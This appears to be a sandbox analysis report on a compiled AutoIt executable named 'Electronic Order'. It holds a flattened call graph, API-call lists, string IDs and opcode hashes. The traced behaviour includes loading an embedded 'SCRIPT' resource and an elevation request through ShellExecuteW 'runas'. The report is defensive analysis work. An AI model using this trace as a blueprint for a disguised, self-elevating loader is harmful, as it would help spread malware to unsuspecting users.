100226->100126 100227->100131 100228->100167 100230 df0fa3 _wprintf 100229->100230 100231 df0fc7 100230->100231 100232 df0fb0 100230->100232 100233 df108b 100231->100233 100235 df0fdb 100231->100235 100234 de8d34 __chsize_nolock 58 API calls 100232->100234 100236 de8d34 __chsize_nolock 58 API calls 100233->100236 100237 df0fb5 100234->100237 100238 df0ff9 100235->100238 100239 df1006 100235->100239 100240 df0ffe 100236->100240 100241 de8d68 __vswprintf_l 58 API calls 100237->100241 100242 de8d34 __chsize_nolock 58 API calls 100238->100242 100243 df1028 100239->100243 100244 df1013 100239->100244 100247 de8d68 __vswprintf_l 58 API calls 100240->100247 100251 df0fbc _wprintf 100241->100251 100242->100240 100246 ded446 ___lock_fhandle 59 API calls 100243->100246 100245 de8d34 __chsize_nolock 58 API calls 100244->100245 100248 df1018 100245->100248 100249 df102e 100246->100249 100250 df1020 100247->100250 100252 de8d68 __vswprintf_l 58 API calls 100248->100252 100253 df1054 100249->100253 100254 df1041 100249->100254 100255 de8ff6 __vswprintf_l 9 API calls 100250->100255 100251->100197 100252->100250 100256 de8d68 __vswprintf_l 58 API calls 100253->100256 100257 df10ab __read_nolock 70 API calls 100254->100257 100255->100251 100259 df1059 100256->100259 100258 df104d 100257->100258 100261 df1083 __read LeaveCriticalSection 100258->100261 100260 de8d34 __chsize_nolock 58 API calls 100259->100260 100260->100258 100261->100251 100262->100189 100263->100200 100264->100193 100268 de543a GetSystemTimeAsFileTime 100265->100268 100267 e291f8 100267->99884 100269 de5468 __aulldiv 100268->100269 100269->100267 100271 de5e9c _wprintf 100270->100271 100272 de5eae 100271->100272 100273 de5ec3 100271->100273 100284 de8d68 58 API calls __getptd_noexit 100272->100284 100274 de6e4e __lock_file 59 API calls 100273->100274 100277 de5ec9 100274->100277 100276 de5eb3 100285 de8ff6 9 API calls __vswprintf_l 100276->100285 100286 de5b00 67 API calls 6 library calls 100277->100286 100280 de5ed4 100287 de5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100280->100287 100282 de5ee6 100283 de5ebe _wprintf 100282->100283 100283->99889 100284->100276 100285->100283 100286->100280 100287->100282 100399 dc1066 100404 dcf8cf 100399->100404 100401 dc106c 100402 de2f80 __cinit 67 API calls 100401->100402 100403 dc1076 100402->100403 100405 dcf8f0 100404->100405 100437 de0143 100405->100437 100409 dcf937 100410 dc77c7 59 API calls 100409->100410 100411 dcf941 100410->100411 100412 dc77c7 59 API calls 100411->100412 100413 dcf94b 100412->100413 100414 dc77c7 59 API calls 100413->100414 100415 dcf955 100414->100415 100416 dc77c7 59 API calls 100415->100416 100417 dcf993 100416->100417 100418 dc77c7 59 API calls 100417->100418 100419 dcfa5e 100418->100419 100447 dd60e7 100419->100447 100423 dcfa90 100424 dc77c7 59 API calls 100423->100424 100425 dcfa9a 100424->100425 100475 ddffde 100425->100475 100427 dcfae1 100428 dcfaf1 GetStdHandle 100427->100428 100429 dcfb3d 100428->100429 100430 e049d5 100428->100430 100431 dcfb45 OleInitialize 100429->100431 100430->100429 100432 e049de 100430->100432 100431->100401 100482 e26dda 64 API calls Mailbox 100432->100482 100434 e049e5 100483 e274a9 CreateThread 100434->100483 100436 e049f1 CloseHandle 100436->100431 100484 de021c 100437->100484 100440 de021c 59 API calls 100441 de0185 100440->100441 100442 dc77c7 59 API calls 100441->100442 100443 de0191 100442->100443 100444 dc7d2c 59 API calls 100443->100444 100445 dcf8f6 100444->100445 100446 de03a2 6 API calls 100445->100446 100446->100409 100448 dc77c7 59 API calls 100447->100448 100449 dd60f7 100448->100449 100450 dc77c7 59 API calls 100449->100450 100451 dd60ff 100450->100451 100491 dd5bfd 100451->100491 100454 dd5bfd 59 API calls 100455 dd610f 100454->100455 100456 dc77c7 59 API calls 100455->100456 100457 dd611a 100456->100457 100458 de0ff6 Mailbox 59 API calls 100457->100458 100459 dcfa68 100458->100459 100460 dd6259 100459->100460 100461 dd6267 100460->100461 100462 dc77c7 59 API calls 100461->100462 100463 dd6272 100462->100463 100464 dc77c7 59 API calls 100463->100464 100465 dd627d 100464->100465 100466 dc77c7 59 API calls 100465->100466 100467 dd6288 100466->100467 100468 dc77c7 59 API calls 100467->100468 100469 dd6293 100468->100469 100470 dd5bfd 59 API calls 100469->100470 100471 dd629e 100470->100471 100472 de0ff6 Mailbox 59 API calls 100471->100472 100473 dd62a5 RegisterWindowMessageW 100472->100473 100473->100423 100476 e15cc3 100475->100476 100477 ddffee 100475->100477 100494 e29d71 60 API calls 100476->100494 100478 de0ff6 Mailbox 59 API calls 100477->100478 100480 ddfff6 100478->100480 100480->100427 100481 e15cce 100482->100434 100483->100436 100495 e2748f 65 API calls 100483->100495 100485 dc77c7 59 API calls 100484->100485 100486 de0227 100485->100486 100487 dc77c7 59 API calls 100486->100487 100488 de022f 100487->100488 100489 dc77c7 59 API calls 100488->100489 100490 de017b 100489->100490 100490->100440 100492 dc77c7 59 API calls 100491->100492 100493 dd5c05 100492->100493 100493->100454 100494->100481 100496 dc1016 100501 dc4ad2 100496->100501 100499 de2f80 __cinit 67 API calls 100500 dc1025 100499->100500 100502 de0ff6 Mailbox 59 API calls 100501->100502 100503 dc4ada 100502->100503 100504 dc101b 100503->100504 100508 dc4a94 100503->100508 100504->100499 100509 dc4a9d 100508->100509 100511 dc4aaf 100508->100511 100510 de2f80 __cinit 67 API calls 100509->100510 100510->100511 100512 dc4afe 100511->100512 100513 dc77c7 59 API calls 100512->100513 100514 dc4b16 GetVersionExW 100513->100514 100515 dc7d2c 59 API calls 100514->100515 100516 dc4b59 100515->100516 100517 dc7e8c 59 API calls 100516->100517 100522 dc4b86 100516->100522 100518 dc4b7a 100517->100518 100519 dc7886 59 API calls 100518->100519 100519->100522 100520 dc4bf1 GetCurrentProcess IsWow64Process 100521 dc4c0a 100520->100521 100524 dc4c89 GetSystemInfo 100521->100524 100525 dc4c20 100521->100525 100522->100520 100523 dfdc8d 100522->100523 100526 dc4c56 100524->100526 100536 dc4c95 100525->100536 100526->100504 100529 dc4c7d GetSystemInfo 100531 dc4c47 100529->100531 100530 dc4c32 100532 dc4c95 2 API calls 100530->100532 100531->100526 100533 dc4c4d FreeLibrary 100531->100533 100534 dc4c3a GetNativeSystemInfo 100532->100534 100533->100526 100534->100531 100537 dc4c2e 100536->100537 100538 dc4c9e LoadLibraryA 100536->100538 100537->100529 100537->100530 100538->100537 100539 dc4caf GetProcAddress 100538->100539 100539->100537 100540 de7e93 100541 de7e9f _wprintf 100540->100541 100577 dea048 GetStartupInfoW 100541->100577 100544 de7efc 100546 de7f07 100544->100546 100662 de7fe3 58 API calls 3 library calls 100544->100662 100545 de7ea4 100579 de8dbc GetProcessHeap 100545->100579 100580 de9d26 100546->100580 100549 de7f0d 100551 de7f18 __RTC_Initialize 100549->100551 100663 de7fe3 58 API calls 3 library calls 100549->100663 100601 ded812 100551->100601 100553 de7f27 100554 de7f33 GetCommandLineW 100553->100554 100664 de7fe3 58 API calls 3 library calls 100553->100664 100620 df5173 GetEnvironmentStringsW 100554->100620 100557 de7f32 100557->100554 100560 de7f4d 100561 de7f58 100560->100561 100665 de32f5 58 API calls 3 library calls 100560->100665 100630 df4fa8 100561->100630 100564 de7f5e 100565 de7f69 100564->100565 100666 de32f5 58 API calls 3 library calls 100564->100666 100644 de332f 100565->100644 100568 de7f71 100569 de7f7c __wwincmdln 100568->100569 100667 de32f5 58 API calls 3 library calls 100568->100667 100650 dc492e 100569->100650 100572 de7f90 100573 de7f9f 100572->100573 100668 de3598 58 API calls _doexit 100572->100668 100669 de3320 58 API calls _doexit 100573->100669 100576 de7fa4 _wprintf 100578 dea05e 100577->100578 100578->100545 100579->100544 100670 de33c7 36 API calls 2 library calls 100580->100670 100582 de9d2b 100671 de9f7c InitializeCriticalSectionAndSpinCount __getstream 100582->100671 100584 de9d30 100585 de9d34 100584->100585 100673 de9fca TlsAlloc 100584->100673 100672 de9d9c 61 API calls 2 library calls 100585->100672 100588 de9d39 100588->100549 100589 de9d46 100589->100585 100590 de9d51 100589->100590 100674 de8a15 100590->100674 100593 de9d93 100682 de9d9c 61 API calls 2 library calls 100593->100682 100596 de9d98 100596->100549 100597 de9d72 100597->100593 100598 de9d78 100597->100598 100681 de9c73 58 API calls 4 library calls 100598->100681 100600 de9d80 GetCurrentThreadId 100600->100549 100602 ded81e _wprintf 100601->100602 100603 de9e4b __lock 58 API calls 100602->100603 100604 ded825 100603->100604 100605 de8a15 __calloc_crt 58 API calls 100604->100605 100606 ded836 100605->100606 100607 ded8a1 GetStartupInfoW 100606->100607 100608 ded841 _wprintf @_EH4_CallFilterFunc@8 100606->100608 100613 ded8b6 100607->100613 100617 ded9e5 100607->100617 100608->100553 100609 dedaad 100696 dedabd LeaveCriticalSection _doexit 100609->100696 100611 de8a15 __calloc_crt 58 API calls 100611->100613 100612 deda32 GetStdHandle 100612->100617 100613->100611 100616 ded904 100613->100616 100613->100617 100614 deda45 GetFileType 100614->100617 100615 ded938 GetFileType 100615->100616 100616->100615 100616->100617 100694 dea06b InitializeCriticalSectionAndSpinCount 100616->100694 100617->100609 100617->100612 100617->100614 100695 dea06b InitializeCriticalSectionAndSpinCount 100617->100695 100621 de7f43 100620->100621 100622 df5184 100620->100622 100626 df4d6b GetModuleFileNameW 100621->100626 100697 de8a5d 58 API calls 2 library calls 100622->100697 100624 df51aa _memmove 100625 df51c0 FreeEnvironmentStringsW 100624->100625 100625->100621 100627 df4d9f _wparse_cmdline 100626->100627 100629 df4ddf _wparse_cmdline 100627->100629 100698 de8a5d 58 API calls 2 library calls 100627->100698 100629->100560 100631 df4fc1 __NMSG_WRITE 100630->100631 100635 df4fb9 100630->100635 100632 de8a15 __calloc_crt 58 API calls 100631->100632 100640 df4fea __NMSG_WRITE 100632->100640 100633 df5041 100634 de2f95 _free 58 API calls 100633->100634 100634->100635 100635->100564 100636 de8a15 __calloc_crt 58 API calls 100636->100640 100637 df5066 100638 de2f95 _free 58 API calls 100637->100638 100638->100635 100640->100633 100640->100635 100640->100636 100640->100637 100641 df507d 100640->100641 100699 df4857 58 API calls __vswprintf_l 100640->100699 100700 de9006 IsProcessorFeaturePresent 100641->100700 100643 df5089 100643->100564 100646 de333b __IsNonwritableInCurrentImage 100644->100646 100715 dea711 100646->100715 100647 de3359 __initterm_e 100648 de2f80 __cinit 67 API calls 100647->100648 100649 de3378 __cinit __IsNonwritableInCurrentImage 100647->100649 100648->100649 100649->100568 100651 dc4948 100650->100651 100661 dc49e7 100650->100661 100652 dc4982 IsThemeActive 100651->100652 100718 de35ac 100652->100718 100656 dc49ae 100730 dc4a5b SystemParametersInfoW SystemParametersInfoW 100656->100730 100658 dc49ba 100731 dc3b4c 100658->100731 100661->100572 100662->100546 100663->100551 100664->100557 100668->100573 100669->100576 100670->100582 100671->100584 100672->100588 100673->100589 100677 de8a1c 100674->100677 100676 de8a57 100676->100593 100680 dea026 TlsSetValue 100676->100680 100677->100676 100679 de8a3a 100677->100679 100683 df5446 100677->100683 100679->100676 100679->100677 100691 dea372 Sleep 100679->100691 100680->100597 100681->100600 100682->100596 100684 df546c 100683->100684 100685 df5451 100683->100685 100688 df547c HeapAlloc 100684->100688 100689 df5462 100684->100689 100693 de35e1 DecodePointer 100684->100693 100685->100684 100686 df545d 100685->100686 100692 de8d68 58 API calls __getptd_noexit 100686->100692 100688->100684 100688->100689 100689->100677 100691->100679 100692->100689 100693->100684 100694->100616 100695->100617 100696->100608 100697->100624 100698->100629 100699->100640 100701 de9011 100700->100701 100706 de8e99 100701->100706 100705 de902c 100705->100643 100707 de8eb3 _memset ___raise_securityfailure 100706->100707 100708 de8ed3 IsDebuggerPresent 100707->100708 100714 dea395 SetUnhandledExceptionFilter UnhandledExceptionFilter 100708->100714 100710 dec836 __NMSG_WRITE 6 API calls 100711 de8fba 100710->100711 100713 dea380 GetCurrentProcess TerminateProcess 100711->100713 100712 de8f97 ___raise_securityfailure 100712->100710 100713->100705 100714->100712 100716 dea714 EncodePointer 100715->100716 100716->100716 100717 dea72e 100716->100717 100717->100647 100719 de9e4b __lock 58 API calls 100718->100719 100720 de35b7 DecodePointer EncodePointer 100719->100720 100783 de9fb5 LeaveCriticalSection 100720->100783 100722 dc49a7 100723 de3614 100722->100723 100724 de361e 100723->100724 100725 de3638 100723->100725 100724->100725 100784 de8d68 58 API calls __getptd_noexit 100724->100784 100725->100656 100727 de3628 100785 de8ff6 9 API calls __vswprintf_l 100727->100785 100729 de3633 100729->100656 100730->100658 100732 dc3b59 __write_nolock 100731->100732 100733 dc77c7 59 API calls 100732->100733 100734 dc3b63 GetCurrentDirectoryW 100733->100734 100786 dc3778 100734->100786 100783->100722 100784->100727 100785->100729 100787 dc77c7 59 API calls 100786->100787 100788 dc378e 100787->100788 100988 dc3d43 100788->100988 100790 dc37ac 100791 dc4864 61 API calls 100790->100791 100792 dc37c0 100791->100792 100793 dc7f41 59 API calls 100792->100793 100794 dc37cd 100793->100794 100795 dc4f3d 136 API calls 100794->100795 100796 dc37e6 100795->100796 100797 dfd3ae 100796->100797 100798 dc37ee Mailbox 100796->100798 101030 e297e5 100797->101030 100802 dc81a7 59 API calls 100798->100802 100801 dfd3cd 100804 de2f95 _free 58 API calls 100801->100804 100805 dc3801 100802->100805 100803 dc4faa 84 API calls 100803->100801 100806 dfd3da 100804->100806 101002 dc93ea 100805->101002 100808 dc4faa 84 API calls 100806->100808 100810 dfd3e3 100808->100810 100814 dc3ee2 59 API calls 100810->100814 100811 dc7f41 59 API calls 100812 dc381a 100811->100812 100813 dc8620 69 API calls 100812->100813 100815 dc382c Mailbox 100813->100815 100816 dfd3fe 100814->100816 100817 dc7f41 59 API calls 100815->100817 100818 dc3ee2 59 API calls 100816->100818 100819 dc3852 100817->100819 100820 dfd41a 100818->100820 100821 dc8620 69 API calls 100819->100821 100822 dc4864 61 API calls 100820->100822 100824 dc3861 Mailbox 100821->100824 100827 dc77c7 59 API calls 100824->100827 100829 dc387f 100827->100829 101005 dc3ee2 100829->101005 100989 dc3d50 __write_nolock 100988->100989 100990 dc7d2c 59 API calls 100989->100990 100994 dc3eb6 Mailbox 100989->100994 100992 dc3d82 100990->100992 100991 dc7b52 59 API calls 100991->100992 100992->100991 101000 dc3db8 Mailbox 100992->101000 100993 dc3e89 100993->100994 100995 dc7f41 59 API calls 100993->100995 100994->100790 100997 dc3eaa 100995->100997 100996 dc7f41 59 API calls 100996->101000 100999 dc3f84 59 API calls 100997->100999 100998 dc7b52 59 API calls 100998->101000 100999->100994 101000->100993 101000->100994 101000->100996 101000->100998 101001 dc3f84 59 API calls 101000->101001 101001->101000 101003 de0ff6 Mailbox 59 API calls 101002->101003 101004 dc380d 101003->101004 101004->100811 101031 dc5045 85 API calls 101030->101031 101032 e29854 101031->101032 101033 e299be 96 API calls 101032->101033 101034 e29866 101033->101034 101035 dc506b 74 API calls 101034->101035 101063 dfd3c1 101034->101063 101036 e29881 101035->101036 101037 dc506b 74 API calls 101036->101037 101038 e29891 101037->101038 101039 dc506b 74 API calls 101038->101039 101040 e298ac 101039->101040 101041 dc506b 74 API calls 101040->101041 101042 e298c7 101041->101042 101043 dc5045 85 API calls 101042->101043 101044 e298de 101043->101044 101045 de594c __malloc_crt 58 API calls 101044->101045 101046 e298e5 101045->101046 101063->100801 101063->100803 101344 dc3633 101345 dc366a 101344->101345 101346 dc3688 101345->101346 101347 dc36e7 101345->101347 101384 dc36e5 101345->101384 101351 dc375d PostQuitMessage 101346->101351 101352 dc3695 101346->101352 101349 dc36ed 101347->101349 101350 dfd31c 101347->101350 101348 dc36ca DefWindowProcW 101386 dc36d8 101348->101386 101353 dc3715 SetTimer RegisterWindowMessageW 101349->101353 101354 dc36f2 101349->101354 101394 dd11d0 10 API calls Mailbox 101350->101394 101351->101386 101355 dfd38f 101352->101355 101356 dc36a0 101352->101356 101360 dc373e CreatePopupMenu 101353->101360 101353->101386 101358 dfd2bf 101354->101358 101359 dc36f9 KillTimer 101354->101359 101399 e22a16 71 API calls _memset 101355->101399 101361 dc36a8 101356->101361 101362 dc3767 101356->101362 101366 dfd2f8 MoveWindow 101358->101366 101367 dfd2c4 101358->101367 101389 dc44cb Shell_NotifyIconW _memset 101359->101389 101360->101386 101369 dc36b3 101361->101369 101376 dfd374 101361->101376 101392 dc4531 64 API calls _memset 101362->101392 101364 dfd343 101395 dd11f3 331 API calls Mailbox 101364->101395 101366->101386 101373 dfd2c8 101367->101373 101374 dfd2e7 SetFocus 101367->101374 101377 dc36be 101369->101377 101378 dc374b 101369->101378 101370 dfd3a1 101370->101348 101370->101386 101372 dc375b 101372->101386 101373->101377 101379 dfd2d1 101373->101379 101374->101386 101375 dc370c 101390 dc3114 DeleteObject DestroyWindow Mailbox 101375->101390 101376->101348 101398 e1817e 59 API calls Mailbox 101376->101398 101377->101348 101396 dc44cb Shell_NotifyIconW _memset 101377->101396 101391 dc45df 81 API calls _memset 101378->101391 101393 dd11d0 10 API calls Mailbox 101379->101393 101384->101348 101387 dfd368 101397 dc43db 68 API calls _memset 101387->101397 101389->101375 101390->101386 101391->101372 101392->101372 101393->101386 101394->101364 101395->101377 101396->101387 101397->101384 101398->101384 101399->101370

                                      Executed Functions

                                      Function 00DC3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC3B7A
                                      • IsDebuggerPresent.KERNEL32 ref: 00DC3B8C
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E862F8,00E862E0,?,?), ref: 00DC3BFD
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00DD0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3C26,00E862F8,?,?,?), ref: 00DD0ACE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC3C81
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E793F0,00000010), ref: 00DFD4BC
                                      • SetCurrentDirectoryW.KERNEL32(?,00E862F8,?,?,?), ref: 00DFD4F4
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E75D40,00E862F8,?,?,?), ref: 00DFD57A
                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DFD581
                                        • Part of subcall function 00DC3A58: GetSysColorBrush.USER32(0000000F), ref: 00DC3A62
                                        • Part of subcall function 00DC3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DC3A71
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(00000063), ref: 00DC3A88
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(000000A4), ref: 00DC3A9A
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(000000A2), ref: 00DC3AAC
                                        • Part of subcall function 00DC3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC3AD2
                                        • Part of subcall function 00DC3A58: RegisterClassExW.USER32(?), ref: 00DC3B28
                                        • Part of subcall function 00DC39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC3A15
                                        • Part of subcall function 00DC39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3A36
                                        • Part of subcall function 00DC39E7: ShowWindow.USER32(00000000,?,?), ref: 00DC3A4A
                                        • Part of subcall function 00DC39E7: ShowWindow.USER32(00000000,?,?), ref: 00DC3A53
                                        • Part of subcall function 00DC43DB: _memset.LIBCMT ref: 00DC4401
                                        • Part of subcall function 00DC43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC44A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas$%
                                      • API String ID: 529118366-3343222573
                                      • Opcode ID: d64b23dc34929ce9a01daf8a4eb0d702f6e315832495bc2fbd3554dac3ad4789
                                      • Instruction ID: 46081df31e90eaf123e955ef927f44e09ce7c70acb0d6a649a1bc9272180999a
                                      • Opcode Fuzzy Hash: d64b23dc34929ce9a01daf8a4eb0d702f6e315832495bc2fbd3554dac3ad4789
                                      • Instruction Fuzzy Hash: A151F73090424AAECB11ABB5DC05FFD7B79EF45700F0481ADF459B71A2DA708A4ACB31
                                      Function 00DC4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1037 dc4afe-dc4b5e call dc77c7 GetVersionExW call dc7d2c 1042 dc4c69-dc4c6b 1037->1042 1043 dc4b64 1037->1043 1044 dfdb90-dfdb9c 1042->1044 1045 dc4b67-dc4b6c 1043->1045 1046 dfdb9d-dfdba1 1044->1046 1047 dc4c70-dc4c71 1045->1047 1048 dc4b72 1045->1048 1050 dfdba4-dfdbb0 1046->1050 1051 dfdba3 1046->1051 1049 dc4b73-dc4baa call dc7e8c call dc7886 1047->1049 1048->1049 1059 dfdc8d-dfdc90 1049->1059 1060 dc4bb0-dc4bb1 1049->1060 1050->1046 1053 dfdbb2-dfdbb7 1050->1053 1051->1050 1053->1045 1055 dfdbbd-dfdbc4 1053->1055 1055->1044 1057 dfdbc6 1055->1057 1061 dfdbcb-dfdbce 1057->1061 1062 dfdca9-dfdcad 1059->1062 1063 dfdc92 1059->1063 1060->1061 1064 dc4bb7-dc4bc2 1060->1064 1065 dfdbd4-dfdbf2 1061->1065 1066 dc4bf1-dc4c08 GetCurrentProcess IsWow64Process 1061->1066 1071 dfdcaf-dfdcb8 1062->1071 1072 dfdc98-dfdca1 1062->1072 1067 dfdc95 1063->1067 1068 dc4bc8-dc4bca 1064->1068 1069 dfdc13-dfdc19 1064->1069 1065->1066 1070 dfdbf8-dfdbfe 1065->1070 1073 dc4c0d-dc4c1e 1066->1073 1074 dc4c0a 1066->1074 1067->1072 1075 dfdc2e-dfdc3a 1068->1075 1076 dc4bd0-dc4bd3 1068->1076 1079 dfdc1b-dfdc1e 1069->1079 1080 dfdc23-dfdc29 1069->1080 1077 dfdc08-dfdc0e 1070->1077 1078 dfdc00-dfdc03 1070->1078 1071->1067 1081 dfdcba-dfdcbd 1071->1081 1072->1062 1082 dc4c89-dc4c93 GetSystemInfo 1073->1082 1083 dc4c20-dc4c30 call dc4c95 1073->1083 1074->1073 1087 dfdc3c-dfdc3f 1075->1087 1088 dfdc44-dfdc4a 1075->1088 1084 dfdc5a-dfdc5d 1076->1084 1085 dc4bd9-dc4be8 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1072 1086 dc4c56-dc4c66 1082->1086 1094 dc4c7d-dc4c87 GetSystemInfo 1083->1094 1095 dc4c32-dc4c3f call dc4c95 1083->1095 1084->1066 1093 dfdc63-dfdc78 1084->1093 1090 dfdc4f-dfdc55 1085->1090 1091 dc4bee 1085->1091 1087->1066 1088->1066 1090->1066 1091->1066 1096 dfdc7a-dfdc7d 1093->1096 1097 dfdc82-dfdc88 1093->1097 1098 dc4c47-dc4c4b 1094->1098 1102 dc4c76-dc4c7b 1095->1102 1103 dc4c41-dc4c45 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1098->1086 1100 dc4c4d-dc4c50 FreeLibrary 1098->1100 1100->1086 1102->1103 1103->1098
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00DC4B2B
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • GetCurrentProcess.KERNEL32(?,00E4FAEC,00000000,00000000,?), ref: 00DC4BF8
                                      • IsWow64Process.KERNEL32(00000000), ref: 00DC4BFF
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DC4C45
                                      • FreeLibrary.KERNEL32(00000000), ref: 00DC4C50
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00DC4C81
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00DC4C8D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: 54686099531e2041b8d1d5fc8aa3464651012265a0aed45cb58795a17b398556
                                      • Instruction ID: 7d02d4e1eab28296c1c2f2f9d4a4cbe1250538eba88ede5534285c6ff028df28
                                      • Opcode Fuzzy Hash: 54686099531e2041b8d1d5fc8aa3464651012265a0aed45cb58795a17b398556
                                      • Instruction Fuzzy Hash: FB91D93154A7C5DEC731DB7885616AAFFE6AF2A300B488D5DE0CB93A41D230E948D739
                                      Function 00DC4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1104 dc4fe9-dc5001 CreateStreamOnHGlobal 1105 dc5021-dc5026 1104->1105 1106 dc5003-dc501a FindResourceExW 1104->1106 1107 dfdd5c-dfdd6b LoadResource 1106->1107 1108 dc5020 1106->1108 1107->1108 1109 dfdd71-dfdd7f SizeofResource 1107->1109 1108->1105 1109->1108 1110 dfdd85-dfdd90 LockResource 1109->1110 1110->1108 1111 dfdd96-dfddb4 1110->1111 1111->1108
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DC4EEE,?,?,00000000,00000000), ref: 00DC4FF9
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DC4EEE,?,?,00000000,00000000), ref: 00DC5010
                                      • LoadResource.KERNEL32(?,00000000,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F), ref: 00DFDD60
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F), ref: 00DFDD75
                                      • LockResource.KERNEL32(00DC4EEE,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F,00000000), ref: 00DFDD88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 4ee9293358816ccf34bf280081548fdea61c41b2a150b9a549819aae728ab895
                                      • Instruction ID: 5e8d9867e1ae72a0f35cc746da5f9f13f0f198080a71c8402493a8a7c859e5fb
                                      • Opcode Fuzzy Hash: 4ee9293358816ccf34bf280081548fdea61c41b2a150b9a549819aae728ab895
                                      • Instruction Fuzzy Hash: 76119A75200701AFD7218B66EC48F277BB9EBCAB12F24816CF406D6260DBA1E8459670
                                      Function 00DCE800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
